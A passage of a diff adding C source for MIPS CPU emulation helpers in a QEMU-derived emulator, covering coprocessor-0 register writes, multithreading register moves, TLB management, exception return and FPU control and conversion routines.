0; +} + +void helper_mtc0_config0(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Config0 = (env->CP0_Config0 & 0x81FFFFF8) | (arg1 & 0x00000007); +} + +void helper_mtc0_config2(CPUMIPSState *env, target_ulong arg1) +{ + /* tertiary/secondary caches not implemented */ + env->CP0_Config2 = (env->CP0_Config2 & 0x8FFF0FFF); +} + +void helper_mtc0_config4(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Config4 = (env->CP0_Config4 & (~env->CP0_Config4_rw_bitmask)) | + (arg1 & env->CP0_Config4_rw_bitmask); +} + +void helper_mtc0_config5(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Config5 = (env->CP0_Config5 & (~env->CP0_Config5_rw_bitmask)) | + (arg1 & env->CP0_Config5_rw_bitmask); + compute_hflags(env); +} + +void helper_mtc0_lladdr(CPUMIPSState *env, target_ulong arg1) +{ + target_long mask = env->CP0_LLAddr_rw_bitmask; + arg1 = arg1 << env->CP0_LLAddr_shift; + env->lladdr = (env->lladdr & ~mask) | (arg1 & mask); +} + +void helper_mtc0_watchlo(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + /* Watch exceptions for instructions, data loads, data stores + not implemented. */ + env->CP0_WatchLo[sel] = (arg1 & ~0x7); +} + +void helper_mtc0_watchhi(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + env->CP0_WatchHi[sel] = (arg1 & 0x40FF0FF8); + env->CP0_WatchHi[sel] &= ~(env->CP0_WatchHi[sel] & arg1 & 0x7); +} + +void helper_mtc0_xcontext(CPUMIPSState *env, target_ulong arg1) +{ + target_ulong mask = (1ULL << (env->SEGBITS - 7)) - 1; + env->CP0_XContext = (env->CP0_XContext & mask) | (arg1 & ~mask); +} + +void helper_mtc0_framemask(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Framemask = arg1; /* XXX */ +} + +void helper_mtc0_debug(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Debug = (env->CP0_Debug & 0x8C03FC1F) | (arg1 & 0x13300120); + if (arg1 & (1 << CP0DB_DM)) + env->hflags |= MIPS_HFLAG_DM; + else + env->hflags &= ~MIPS_HFLAG_DM; +} + +void helper_mttc0_debug(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + uint32_t val = arg1 & ((1 << CP0DB_SSt) | (1 << CP0DB_Halt)); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + /* XXX: Might be wrong, check with EJTAG spec. */ + if (other_tc == other->current_tc) + other->active_tc.CP0_Debug_tcstatus = val; + else + other->tcs[other_tc].CP0_Debug_tcstatus = val; + other->CP0_Debug = (other->CP0_Debug & + ((1 << CP0DB_SSt) | (1 << CP0DB_Halt))) | + (arg1 & ~((1 << CP0DB_SSt) | (1 << CP0DB_Halt))); +} + +void helper_mtc0_performance0(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Performance0 = arg1 & 0x000007ff; +} + +void helper_mtc0_taglo(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_TagLo = arg1 & 0xFFFFFCF6; +} + +void helper_mtc0_datalo(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_DataLo = arg1; /* XXX */ +} + +void helper_mtc0_taghi(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_TagHi = arg1; /* XXX */ +} + +void helper_mtc0_datahi(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_DataHi = arg1; /* XXX */ +} + +/* MIPS MT functions */ +target_ulong helper_mftgpr(CPUMIPSState *env, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.gpr[sel]; + else + return other->tcs[other_tc].gpr[sel]; +} + +target_ulong helper_mftlo(CPUMIPSState *env, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.LO[sel]; + else + return other->tcs[other_tc].LO[sel]; +} + +target_ulong helper_mfthi(CPUMIPSState *env, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.HI[sel]; + else + return other->tcs[other_tc].HI[sel]; +} + +target_ulong helper_mftacx(CPUMIPSState *env, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.ACX[sel]; + else + return other->tcs[other_tc].ACX[sel]; +} + +target_ulong helper_mftdsp(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.DSPControl; + else + return other->tcs[other_tc].DSPControl; +} + +void helper_mttgpr(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.gpr[sel] = arg1; + else + other->tcs[other_tc].gpr[sel] = arg1; +} + +void helper_mttlo(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.LO[sel] = arg1; + else + other->tcs[other_tc].LO[sel] = arg1; +} + +void helper_mtthi(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.HI[sel] = arg1; + else + other->tcs[other_tc].HI[sel] = arg1; +} + +void helper_mttacx(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.ACX[sel] = arg1; + else + other->tcs[other_tc].ACX[sel] = arg1; +} + +void helper_mttdsp(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.DSPControl = arg1; + else + other->tcs[other_tc].DSPControl = arg1; +} + +/* MIPS MT functions */ +target_ulong helper_dmt(void) +{ + // TODO + return 0; +} + +target_ulong helper_emt(void) +{ + // TODO + return 0; +} + +target_ulong helper_dvpe(CPUMIPSState *env) +{ + //struct uc_struct *uc = env->uc; + //CPUState *other_cs = uc->cpu; + target_ulong prev = env->mvp->CP0_MVPControl; + + // TODO: #642 SMP groups + /* + CPU_FOREACH(other_cs) { + MIPSCPU *other_cpu = MIPS_CPU(uc, other_cs); + // Turn off all VPEs except the one executing the dvpe. + if (&other_cpu->env != env) { + other_cpu->env.mvp->CP0_MVPControl &= ~(1 << CP0MVPCo_EVP); + mips_vpe_sleep(other_cpu); + } + } + */ + return prev; +} + +target_ulong helper_evpe(CPUMIPSState *env) +{ + //struct uc_struct *uc = env->uc; + //CPUState *other_cs = uc->cpu; + target_ulong prev = env->mvp->CP0_MVPControl; + + // TODO: #642 SMP groups + /* + CPU_FOREACH(other_cs) { + MIPSCPU *other_cpu = MIPS_CPU(uc, other_cs); + + if (&other_cpu->env != env + // If the VPE is WFI, don't disturb its sleep. + && !mips_vpe_is_wfi(other_cpu)) { + // Enable the VPE. + other_cpu->env.mvp->CP0_MVPControl |= (1 << CP0MVPCo_EVP); + mips_vpe_wake(other_cpu); // And wake it up. + } + } + */ + return prev; +} +#endif /* !CONFIG_USER_ONLY */ + +void helper_fork(target_ulong arg1, target_ulong arg2) +{ + // arg1 = rt, arg2 = rs + // TODO: store to TC register +} + +target_ulong helper_yield(CPUMIPSState *env, target_ulong arg) +{ + target_long arg1 = arg; + + if (arg1 < 0) { + /* No scheduling policy implemented. */ + if (arg1 != -2) { + if (env->CP0_VPEControl & (1 << CP0VPECo_YSI) && + env->active_tc.CP0_TCStatus & (1 << CP0TCSt_DT)) { + env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); + env->CP0_VPEControl |= 4 << CP0VPECo_EXCPT; + helper_raise_exception(env, EXCP_THREAD); + } + } + } else if (arg1 == 0) { + if (0 /* TODO: TC underflow */) { + env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); + helper_raise_exception(env, EXCP_THREAD); + } else { + // TODO: Deallocate TC + } + } else if (arg1 > 0) { + /* Yield qualifier inputs not implemented. */ + env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); + env->CP0_VPEControl |= 2 << CP0VPECo_EXCPT; + helper_raise_exception(env, EXCP_THREAD); + } + return env->CP0_YQMask; +} + +#ifndef CONFIG_USER_ONLY +/* TLB management */ +static void cpu_mips_tlb_flush (CPUMIPSState *env, int flush_global) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + + /* Flush qemu's TLB and discard all shadowed entries. */ + tlb_flush(CPU(cpu), flush_global); + env->tlb->tlb_in_use = env->tlb->nb_tlb; +} + +static void r4k_mips_tlb_flush_extra (CPUMIPSState *env, int first) +{ + /* Discard entries from env->tlb[first] onwards. */ + while (env->tlb->tlb_in_use > first) { + r4k_invalidate_tlb(env, --env->tlb->tlb_in_use, 0); + } +} + +static void r4k_fill_tlb(CPUMIPSState *env, int idx) +{ + r4k_tlb_t *tlb; + + /* XXX: detect conflicting TLBs and raise a MCHECK exception when needed */ + tlb = &env->tlb->mmu.r4k.tlb[idx]; + if (env->CP0_EntryHi & (1 << CP0EnHi_EHINV)) { + tlb->EHINV = 1; + return; + } + tlb->EHINV = 0; + tlb->VPN = env->CP0_EntryHi & (((unsigned int)TARGET_PAGE_MASK) << 1); +#if defined(TARGET_MIPS64) + tlb->VPN &= env->SEGMask; +#endif + tlb->ASID = env->CP0_EntryHi & 0xFF; + tlb->PageMask = env->CP0_PageMask; + tlb->G = env->CP0_EntryLo0 & env->CP0_EntryLo1 & 1; + tlb->V0 = (env->CP0_EntryLo0 & 2) != 0; + tlb->D0 = (env->CP0_EntryLo0 & 4) != 0; + tlb->C0 = (env->CP0_EntryLo0 >> 3) & 0x7; + tlb->XI0 = (env->CP0_EntryLo0 >> CP0EnLo_XI) & 1; + tlb->RI0 = (env->CP0_EntryLo0 >> CP0EnLo_RI) & 1; + tlb->PFN[0] = (env->CP0_EntryLo0 >> 6) << 12; + tlb->V1 = (env->CP0_EntryLo1 & 2) != 0; + tlb->D1 = (env->CP0_EntryLo1 & 4) != 0; + tlb->C1 = (env->CP0_EntryLo1 >> 3) & 0x7; + tlb->XI1 = (env->CP0_EntryLo1 >> CP0EnLo_XI) & 1; + tlb->RI1 = (env->CP0_EntryLo1 >> CP0EnLo_RI) & 1; + tlb->PFN[1] = (env->CP0_EntryLo1 >> 6) << 12; +} + +void r4k_helper_tlbinv(CPUMIPSState *env) +{ + int idx; + r4k_tlb_t *tlb; + uint8_t ASID = env->CP0_EntryHi & 0xFF; + + for (idx = 0; idx < env->tlb->nb_tlb; idx++) { + tlb = &env->tlb->mmu.r4k.tlb[idx]; + if (!tlb->G && tlb->ASID == ASID) { + tlb->EHINV = 1; + } + } + cpu_mips_tlb_flush(env, 1); +} + +void r4k_helper_tlbinvf(CPUMIPSState *env) +{ + int idx; + + for (idx = 0; idx < env->tlb->nb_tlb; idx++) { + env->tlb->mmu.r4k.tlb[idx].EHINV = 1; + } + cpu_mips_tlb_flush(env, 1); +} + +void r4k_helper_tlbwi(CPUMIPSState *env) +{ + r4k_tlb_t *tlb; + int idx; + target_ulong VPN; + uint8_t ASID; + bool G, V0, D0, V1, D1; + + idx = (env->CP0_Index & ~0x80000000) % env->tlb->nb_tlb; + tlb = &env->tlb->mmu.r4k.tlb[idx]; + VPN = env->CP0_EntryHi & (((unsigned int)TARGET_PAGE_MASK) << 1); +#if defined(TARGET_MIPS64) + VPN &= env->SEGMask; +#endif + ASID = env->CP0_EntryHi & 0xff; + G = env->CP0_EntryLo0 & env->CP0_EntryLo1 & 1; + V0 = (env->CP0_EntryLo0 & 2) != 0; + D0 = (env->CP0_EntryLo0 & 4) != 0; + V1 = (env->CP0_EntryLo1 & 2) != 0; + D1 = (env->CP0_EntryLo1 & 4) != 0; + + /* Discard cached TLB entries, unless tlbwi is just upgrading access + permissions on the current entry. */ + if (tlb->VPN != VPN || tlb->ASID != ASID || tlb->G != G || + (tlb->V0 && !V0) || (tlb->D0 && !D0) || + (tlb->V1 && !V1) || (tlb->D1 && !D1)) { + r4k_mips_tlb_flush_extra(env, env->tlb->nb_tlb); + } + + r4k_invalidate_tlb(env, idx, 0); + r4k_fill_tlb(env, idx); +} + +void r4k_helper_tlbwr(CPUMIPSState *env) +{ + int r = cpu_mips_get_random(env); + + r4k_invalidate_tlb(env, r, 1); + r4k_fill_tlb(env, r); +} + +void r4k_helper_tlbp(CPUMIPSState *env) +{ + r4k_tlb_t *tlb; + target_ulong mask; + target_ulong tag; + target_ulong VPN; + uint8_t ASID; + int i; + + ASID = env->CP0_EntryHi & 0xFF; + for (i = 0; i < env->tlb->nb_tlb; i++) { + tlb = &env->tlb->mmu.r4k.tlb[i]; + /* 1k pages are not supported. */ + mask = tlb->PageMask | ~(((unsigned int)TARGET_PAGE_MASK) << 1); + tag = env->CP0_EntryHi & ~mask; + VPN = tlb->VPN & ~mask; +#if defined(TARGET_MIPS64) + tag &= env->SEGMask; +#endif + /* Check ASID, virtual page number & size */ + if ((tlb->G == 1 || tlb->ASID == ASID) && VPN == tag && !tlb->EHINV) { + /* TLB match */ + env->CP0_Index = i; + break; + } + } + if (i == env->tlb->nb_tlb) { + /* No match. Discard any shadow entries, if any of them match. */ + for (i = env->tlb->nb_tlb; i < env->tlb->tlb_in_use; i++) { + tlb = &env->tlb->mmu.r4k.tlb[i]; + /* 1k pages are not supported. */ + mask = tlb->PageMask | ~(((unsigned int)TARGET_PAGE_MASK) << 1); + tag = env->CP0_EntryHi & ~mask; + VPN = tlb->VPN & ~mask; +#if defined(TARGET_MIPS64) + tag &= env->SEGMask; +#endif + /* Check ASID, virtual page number & size */ + if ((tlb->G == 1 || tlb->ASID == ASID) && VPN == tag) { + r4k_mips_tlb_flush_extra (env, i); + break; + } + } + + env->CP0_Index |= 0x80000000; + } +} + +void r4k_helper_tlbr(CPUMIPSState *env) +{ + r4k_tlb_t *tlb; + uint8_t ASID; + int idx; + + ASID = env->CP0_EntryHi & 0xFF; + idx = (env->CP0_Index & ~0x80000000) % env->tlb->nb_tlb; + tlb = &env->tlb->mmu.r4k.tlb[idx]; + + /* If this will change the current ASID, flush qemu's TLB. */ + if (ASID != tlb->ASID) + cpu_mips_tlb_flush (env, 1); + + r4k_mips_tlb_flush_extra(env, env->tlb->nb_tlb); + + if (tlb->EHINV) { + env->CP0_EntryHi = 1 << CP0EnHi_EHINV; + env->CP0_PageMask = 0; + env->CP0_EntryLo0 = 0; + env->CP0_EntryLo1 = 0; + } else { + env->CP0_EntryHi = tlb->VPN | tlb->ASID; + env->CP0_PageMask = tlb->PageMask; + env->CP0_EntryLo0 = tlb->G | (tlb->V0 << 1) | (tlb->D0 << 2) | + ((target_ulong)tlb->RI0 << CP0EnLo_RI) | + ((target_ulong)tlb->XI0 << CP0EnLo_XI) | + (tlb->C0 << 3) | (tlb->PFN[0] >> 6); + env->CP0_EntryLo1 = tlb->G | (tlb->V1 << 1) | (tlb->D1 << 2) | + ((target_ulong)tlb->RI1 << CP0EnLo_RI) | + ((target_ulong)tlb->XI1 << CP0EnLo_XI) | + (tlb->C1 << 3) | (tlb->PFN[1] >> 6); + } +} + +void helper_tlbwi(CPUMIPSState *env) +{ + env->tlb->helper_tlbwi(env); +} + +void helper_tlbwr(CPUMIPSState *env) +{ + env->tlb->helper_tlbwr(env); +} + +void helper_tlbp(CPUMIPSState *env) +{ + env->tlb->helper_tlbp(env); +} + +void helper_tlbr(CPUMIPSState *env) +{ + env->tlb->helper_tlbr(env); +} + +void helper_tlbinv(CPUMIPSState *env) +{ + env->tlb->helper_tlbinv(env); +} + +void helper_tlbinvf(CPUMIPSState *env) +{ + env->tlb->helper_tlbinvf(env); +} + +/* Specials */ +target_ulong helper_di(CPUMIPSState *env) +{ + target_ulong t0 = env->CP0_Status; + + env->CP0_Status = t0 & ~(1 << CP0St_IE); + return t0; +} + +target_ulong helper_ei(CPUMIPSState *env) +{ + target_ulong t0 = env->CP0_Status; + + env->CP0_Status = t0 | (1 << CP0St_IE); + return t0; +} + +static void debug_pre_eret(CPUMIPSState *env) +{ + if (qemu_loglevel_mask(CPU_LOG_EXEC)) { + qemu_log("ERET: PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx, + env->active_tc.PC, env->CP0_EPC); + if (env->CP0_Status & (1 << CP0St_ERL)) + qemu_log(" ErrorEPC " TARGET_FMT_lx, env->CP0_ErrorEPC); + if (env->hflags & MIPS_HFLAG_DM) + qemu_log(" DEPC " TARGET_FMT_lx, env->CP0_DEPC); + qemu_log("\n"); + } +} + +static void debug_post_eret(CPUMIPSState *env) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + + if (qemu_loglevel_mask(CPU_LOG_EXEC)) { + qemu_log(" => PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx, + env->active_tc.PC, env->CP0_EPC); + if (env->CP0_Status & (1 << CP0St_ERL)) + qemu_log(" ErrorEPC " TARGET_FMT_lx, env->CP0_ErrorEPC); + if (env->hflags & MIPS_HFLAG_DM) + qemu_log(" DEPC " TARGET_FMT_lx, env->CP0_DEPC); + switch (env->hflags & MIPS_HFLAG_KSU) { + case MIPS_HFLAG_UM: qemu_log(", UM\n"); break; + case MIPS_HFLAG_SM: qemu_log(", SM\n"); break; + case MIPS_HFLAG_KM: qemu_log("\n"); break; + default: + cpu_abort(CPU(cpu), "Invalid MMU mode!\n"); + break; + } + } +} + +static void set_pc(CPUMIPSState *env, target_ulong error_pc) +{ + env->active_tc.PC = error_pc & ~(target_ulong)1; + if (error_pc & 1) { + env->hflags |= MIPS_HFLAG_M16; + } else { + env->hflags &= ~(MIPS_HFLAG_M16); + } +} + +void helper_eret(CPUMIPSState *env) +{ + debug_pre_eret(env); + if (env->CP0_Status & (1 << CP0St_ERL)) { + set_pc(env, env->CP0_ErrorEPC); + env->CP0_Status &= ~(1 << CP0St_ERL); + } else { + set_pc(env, env->CP0_EPC); + env->CP0_Status &= ~(1 << CP0St_EXL); + } + compute_hflags(env); + debug_post_eret(env); + env->lladdr = 1; +} + +void helper_deret(CPUMIPSState *env) +{ + debug_pre_eret(env); + set_pc(env, env->CP0_DEPC); + + env->hflags &= MIPS_HFLAG_DM; + compute_hflags(env); + debug_post_eret(env); + env->lladdr = 1; +} +#endif /* !CONFIG_USER_ONLY */ + +target_ulong helper_rdhwr_cpunum(CPUMIPSState *env) +{ + if ((env->hflags & MIPS_HFLAG_CP0) || + (env->CP0_HWREna & (1 << 0))) + return env->CP0_EBase & 0x3ff; + else + helper_raise_exception(env, EXCP_RI); + + return 0; +} + +target_ulong helper_rdhwr_synci_step(CPUMIPSState *env) +{ + if ((env->hflags & MIPS_HFLAG_CP0) || + (env->CP0_HWREna & (1 << 1))) + return env->SYNCI_Step; + else + helper_raise_exception(env, EXCP_RI); + + return 0; +} + +target_ulong helper_rdhwr_cc(CPUMIPSState *env) +{ + if ((env->hflags & MIPS_HFLAG_CP0) || + (env->CP0_HWREna & (1 << 2))) + return env->CP0_Count; + else + helper_raise_exception(env, EXCP_RI); + + return 0; +} + +target_ulong helper_rdhwr_ccres(CPUMIPSState *env) +{ + if ((env->hflags & MIPS_HFLAG_CP0) || + (env->CP0_HWREna & (1 << 3))) + return env->CCRes; + else + helper_raise_exception(env, EXCP_RI); + + return 0; +} + +void helper_pmon(CPUMIPSState *env, int function) +{ + function /= 2; + switch (function) { + case 2: /* TODO: char inbyte(int waitflag); */ + if (env->active_tc.gpr[4] == 0) + env->active_tc.gpr[2] = -1; + /* Fall through */ + case 11: /* TODO: char inbyte (void); */ + env->active_tc.gpr[2] = -1; + break; + case 3: + case 12: + printf("%c", (char)(env->active_tc.gpr[4] & 0xFF)); + break; + case 17: + break; + case 158: + { + unsigned char *fmt = (void *)(uintptr_t)env->active_tc.gpr[4]; + printf("%s", fmt); + } + break; + } +} + +void helper_wait(CPUMIPSState *env) +{ + CPUState *cs = CPU(mips_env_get_cpu(env)); + + cs->halted = 1; + cpu_reset_interrupt(cs, CPU_INTERRUPT_WAKE); + helper_raise_exception(env, EXCP_HLT); +} + +#if !defined(CONFIG_USER_ONLY) + +void mips_cpu_do_unaligned_access(CPUState *cs, vaddr addr, + int access_type, int is_user, + uintptr_t retaddr) +{ + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + int error_code = 0; + int excp; + + env->CP0_BadVAddr = addr; + + if (access_type == MMU_DATA_STORE) { + excp = EXCP_AdES; + } else { + excp = EXCP_AdEL; + if (access_type == MMU_INST_FETCH) { + error_code |= EXCP_INST_NOTAVAIL; + } + } + + do_raise_exception_err(env, excp, error_code, retaddr); +} + +void tlb_fill(CPUState *cs, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr) +{ + int ret; + + ret = mips_cpu_handle_mmu_fault(cs, addr, is_write, mmu_idx); + if (ret) { + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + + do_raise_exception_err(env, cs->exception_index, + env->error_code, retaddr); + } +} + +void mips_cpu_unassigned_access(CPUState *cs, hwaddr addr, + bool is_write, bool is_exec, int unused, + unsigned size) +{ + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + + /* + * Raising an exception with KVM enabled will crash because it won't be from + * the main execution loop so the longjmp won't have a matching setjmp. + * Until we can trigger a bus error exception through KVM lets just ignore + * the access. + */ + if (is_exec) { + helper_raise_exception(env, EXCP_IBE); + } else { + helper_raise_exception(env, EXCP_DBE); + } +} +#endif /* !CONFIG_USER_ONLY */ + +/* Complex FPU operations which may need stack space. */ + +#define FLOAT_TWO32 make_float32(1 << 30) +#define FLOAT_TWO64 make_float64(1ULL << 62) +#define FP_TO_INT32_OVERFLOW 0x7fffffff +#define FP_TO_INT64_OVERFLOW 0x7fffffffffffffffULL + +/* convert MIPS rounding mode in FCR31 to IEEE library */ +unsigned int ieee_rm[] = { + float_round_nearest_even, + float_round_to_zero, + float_round_up, + float_round_down +}; + +static inline void restore_rounding_mode(CPUMIPSState *env) +{ + set_float_rounding_mode(ieee_rm[env->active_fpu.fcr31 & 3], + &env->active_fpu.fp_status); +} + +static inline void restore_flush_mode(CPUMIPSState *env) +{ + set_flush_to_zero((env->active_fpu.fcr31 & (1 << 24)) != 0, + &env->active_fpu.fp_status); +} + +target_ulong helper_cfc1(CPUMIPSState *env, uint32_t reg) +{ + target_ulong arg1 = 0; + + switch (reg) { + case 0: + arg1 = (int32_t)env->active_fpu.fcr0; + break; + case 1: + /* UFR Support - Read Status FR */ + if (env->active_fpu.fcr0 & (1 << FCR0_UFRP)) { + if (env->CP0_Config5 & (1 << CP0C5_UFR)) { + arg1 = (int32_t) + ((env->CP0_Status & (1 << CP0St_FR)) >> CP0St_FR); + } else { + helper_raise_exception(env, EXCP_RI); + } + } + break; + case 25: + arg1 = ((env->active_fpu.fcr31 >> 24) & 0xfe) | ((env->active_fpu.fcr31 >> 23) & 0x1); + break; + case 26: + arg1 = env->active_fpu.fcr31 & 0x0003f07c; + break; + case 28: + arg1 = (env->active_fpu.fcr31 & 0x00000f83) | ((env->active_fpu.fcr31 >> 22) & 0x4); + break; + default: + arg1 = (int32_t)env->active_fpu.fcr31; + break; + } + + return arg1; +} + +void helper_ctc1(CPUMIPSState *env, target_ulong arg1, uint32_t fs, uint32_t rt) +{ + switch (fs) { + case 1: + /* UFR Alias - Reset Status FR */ + if (!((env->active_fpu.fcr0 & (1 << FCR0_UFRP)) && (rt == 0))) { + return; + } + if (env->CP0_Config5 & (1 << CP0C5_UFR)) { + env->CP0_Status &= ~(1 << CP0St_FR); + compute_hflags(env); + } else { + helper_raise_exception(env, EXCP_RI); + } + break; + case 4: + /* UNFR Alias - Set Status FR */ + if (!((env->active_fpu.fcr0 & (1 << FCR0_UFRP)) && (rt == 0))) { + return; + } + if (env->CP0_Config5 & (1 << CP0C5_UFR)) { + env->CP0_Status |= (1 << CP0St_FR); + compute_hflags(env); + } else { + helper_raise_exception(env, EXCP_RI); + } + break; + case 25: + if ((env->insn_flags & ISA_MIPS32R6) || (arg1 & 0xffffff00)) { + return; + } + env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0x017fffff) | ((arg1 & 0xfe) << 24) | + ((arg1 & 0x1) << 23); + break; + case 26: + if (arg1 & 0x007c0000) + return; + env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0xfffc0f83) | (arg1 & 0x0003f07c); + break; + case 28: + if (arg1 & 0x007c0000) + return; + env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0xfefff07c) | (arg1 & 0x00000f83) | + ((arg1 & 0x4) << 22); + break; + case 31: + if (env->insn_flags & ISA_MIPS32R6) { + uint32_t mask = 0xfefc0000; + env->active_fpu.fcr31 = (arg1 & ~mask) | + (env->active_fpu.fcr31 & mask); + } else if (!(arg1 & 0x007c0000)) { + env->active_fpu.fcr31 = arg1; + } + break; + default: + return; + } + /* set rounding mode */ + restore_rounding_mode(env); + /* set flush-to-zero mode */ + restore_flush_mode(env); + set_float_exception_flags(0, &env->active_fpu.fp_status); + if ((GET_FP_ENABLE(env->active_fpu.fcr31) | 0x20) & GET_FP_CAUSE(env->active_fpu.fcr31)) + do_raise_exception(env, EXCP_FPE, GETPC()); +} + +int ieee_ex_to_mips(int xcpt) +{ + int ret = 0; + if (xcpt) { + if (xcpt & float_flag_invalid) { + ret |= FP_INVALID; + } + if (xcpt & float_flag_overflow) { + ret |= FP_OVERFLOW; + } + if (xcpt & float_flag_underflow) { + ret |= FP_UNDERFLOW; + } + if (xcpt & float_flag_divbyzero) { + ret |= FP_DIV0; + } + if (xcpt & float_flag_inexact) { + ret |= FP_INEXACT; + } + } + return ret; +} + +static inline void update_fcr31(CPUMIPSState *env, uintptr_t pc) +{ + int tmp = ieee_ex_to_mips(get_float_exception_flags(&env->active_fpu.fp_status)); + + SET_FP_CAUSE(env->active_fpu.fcr31, tmp); + + if (tmp) { + set_float_exception_flags(0, &env->active_fpu.fp_status); + + if (GET_FP_ENABLE(env->active_fpu.fcr31) & tmp) { + do_raise_exception(env, EXCP_FPE, pc); + } else { + UPDATE_FP_FLAGS(env->active_fpu.fcr31, tmp); + } + } +} + +/* Float support. + Single precition routines have a "s" suffix, double precision a + "d" suffix, 32bit integer "w", 64bit integer "l", paired single "ps", + paired single lower "pl", paired single upper "pu". */ + +/* unary operations, modifying fp status */ +uint64_t helper_float_sqrt_d(CPUMIPSState *env, uint64_t fdt0) +{ + fdt0 = float64_sqrt(fdt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt0; +} + +uint32_t helper_float_sqrt_s(CPUMIPSState *env, uint32_t fst0) +{ + fst0 = float32_sqrt(fst0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst0; +} + +uint64_t helper_float_cvtd_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t fdt2; + + fdt2 = float32_to_float64(fst0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint64_t helper_float_cvtd_w(CPUMIPSState *env, uint32_t wt0) +{ + uint64_t fdt2; + + fdt2 = int32_to_float64(wt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint64_t helper_float_cvtd_l(CPUMIPSState *env, uint64_t dt0) +{ + uint64_t fdt2; + + fdt2 = int64_to_float64(dt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint64_t helper_float_cvtl_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t dt2; + + dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_cvtl_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t dt2; + + dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_cvtps_pw(CPUMIPSState *env, uint64_t dt0) +{ + uint32_t fst2; + uint32_t fsth2; + + fst2 = int32_to_float32(dt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); + fsth2 = int32_to_float32(dt0 >> 32, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +uint64_t helper_float_cvtpw_ps(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + uint32_t wth2; + int 